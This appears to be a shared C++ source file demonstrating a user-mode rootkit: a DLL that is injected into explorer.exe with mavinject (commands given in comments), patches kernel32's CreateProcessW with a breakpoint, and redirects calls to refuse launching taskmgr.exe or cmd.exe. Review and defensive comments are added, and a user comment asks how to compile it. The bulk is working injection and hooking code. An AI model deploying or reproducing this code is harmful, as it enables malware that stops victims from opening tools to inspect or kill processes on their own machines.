Simple UserMode Hook Example
#include <windows.h> | |
#include <stdio.h> | |
// Address of kernel32!CreateProcessW; resolved by HookFunction(), null until then.
FARPROC fpCreateProcessW{};
// Original first byte of CreateProcessW, saved by HookFunction() before the
// 0xCC patch so MyCreateProcessW can put it back for the pass-through call.
BYTE bSavedByte{};
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe | |
// mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll | |
// | |
// Overwrites `size` bytes at `fpFunc` with the bytes at `b`.
// The containing page is switched to PAGE_EXECUTE_READWRITE for the copy and
// then returned to its previous protection. Returns FALSE if the first
// VirtualProtect fails (nothing is written); otherwise returns the result of
// the restoring VirtualProtect.
// Defensive note: a transient RWX transition on a code page of a loaded
// module is precisely the event that memory-integrity monitoring keys on.
BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
    DWORD dwOldProt = 0;
    const BOOL unlocked = VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt);
    if (!unlocked) {
        return FALSE;
    }
    MoveMemory(fpFunc, b, size);
    // dwOldProt serves as both the protection to restore and the out-parameter;
    // the API reads the new value before it overwrites the old one.
    return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
}
// Installs the hook: resolves kernel32!CreateProcessW, saves its first byte in
// bSavedByte, then overwrites that byte with 0xCC (INT3). Executing the patched
// entry raises a breakpoint exception, which MyUnhandledExceptionFilter below
// redirects to MyCreateProcessW. Called from DllMain, and again after every
// pass-through call in MyCreateProcessW to re-arm the hook.
// Defensive note: the patch is easy to detect — the in-memory first byte of an
// exported kernel32 function no longer matches the on-disk image.
VOID HookFunction(VOID) {
    // NOTE(review): LoadLibrary is repeated on each re-hook and its handle is
    // never released; kernel32 stays mapped regardless, so this only leaks a
    // reference count.
    fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
    if (fpCreateProcessW == NULL) {
        return;
    }
    // Save the original byte before it is overwritten; MyCreateProcessW needs it
    // to restore the entry for the real call.
    bSavedByte = *(LPBYTE)fpCreateProcessW;
    const BYTE bInt3 = 0xCC;
    if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
        // NOTE(review): on failure this ends the calling thread rather than
        // reporting an error. Reached via DllMain that is the thread running
        // the loader; reached via MyCreateProcessW it is the host thread that
        // called CreateProcessW.
        ExitThread(0);
    }
}
// Replacement that the exception filter steers execution into when the INT3 at
// CreateProcessW's entry fires. Because only RIP is moved, it receives the
// original call's arguments and must keep CreateProcessW's WINAPI signature.
// Behavior: refuse with ERROR_ACCESS_DENIED any command line mentioning
// taskmgr.exe or cmd.exe; otherwise restore the original first byte, call the
// real CreateProcessW, and re-arm the hook.
BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {
    // NOTE(review): CreateProcessW allows lpCommandLine == NULL when
    // lpApplicationName is supplied; wcsstr would then dereference a null
    // pointer and crash the host process. The test is a plain substring match,
    // so any command line that merely contains these names is refused too.
    if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL ||
        wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
        SetLastError(ERROR_ACCESS_DENIED);
        return FALSE;
    }
    // Unhook: put the saved original byte back so the real function can run.
    if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
        ExitThread(0);  // ends the calling host thread rather than reporting failure
    }
    // NOTE(review): between the restore above and the re-hook below the entry
    // is unpatched, so another thread calling CreateProcessW in that window is
    // not filtered.
    BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
    // Re-arm. NOTE(review): the re-hook makes several Win32 calls after the
    // real CreateProcessW, so the caller's GetLastError may no longer reflect
    // CreateProcessW's own failure reason.
    HookFunction();
    return b;
}
// Top-level exception filter installed by DllMain. When the INT3 planted at
// CreateProcessW's first byte fires, the faulting RIP equals fpCreateProcessW;
// the filter rewrites RIP to MyCreateProcessW and resumes, so the hook body
// runs with the interrupted call's other registers and stack untouched.
// Rip is the x64 CONTEXT field, so this file builds for 64-bit only (x86 would
// need Eip).
LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
    if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
        lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;
    // NOTE(review): EXCEPTION_CONTINUE_EXECUTION is returned unconditionally,
    // so any unrelated unhandled exception in the host also re-executes its
    // faulting instruction instead of terminating — likely an endless fault
    // loop. A top-level filter is only reached when no debugger or earlier
    // SEH/vectored handler consumed the breakpoint, which is presumably one
    // reason the hook can appear not to fire (e.g. under a debugger) — confirm.
    return EXCEPTION_CONTINUE_EXECUTION;
}
// DLL entry point. On process attach it installs the top-level exception filter
// first (so the INT3 has somewhere to land), shows a message box as a visible
// marker that the DLL was loaded, and then plants the hook. Other reasons are
// ignored. hInstance and lpReserved are unused.
// NOTE(review): the message box and the hooking both run while the loader lock
// is held — presumably fine for a demo, but not something to rely on.
BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
        ::MessageBoxA(NULL, "Boom!", "Injected", 0);
        HookFunction();
    }
    return TRUE;
}
How must I compile it? I compiled it in a clean MS Visual Studio project and it doesn't work.